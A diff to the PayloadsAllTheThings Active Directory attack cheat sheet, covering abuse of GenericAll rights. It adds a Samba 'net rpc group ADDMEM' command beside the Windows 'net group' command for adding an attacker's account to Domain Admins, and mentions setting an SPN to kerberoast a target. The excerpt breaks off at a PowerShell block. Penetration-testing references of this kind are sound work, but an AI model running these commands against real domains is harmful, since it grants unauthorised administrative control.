swisskyrepo/PayloadsAllTheThings/Methodology and Resources/Active Directory Attack.md

 #### GenericAll

 * **GenericAll on User** : We can reset user's password without knowing the current password
-* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group : `net group "domain admins" spotless /add /domain`
+* **GenericAll on Group** : Effectively, this allows us to add ourselves (the user spotless) to the Domain Admin group :
+	* On Windows : `net group "domain admins" spotless /add /domain`
+	* On Linux using the Samba software suite : `net rpc group ADDMEM "GROUP NAME" UserToAdd -U 'AttackerUser%MyPassword' -W DOMAIN -I [DC IP]`

 * **GenericAll/GenericWrite** : We can set a **SPN** on a target account, request a TGS, then grab its hash and kerberoast it.
   ```powershell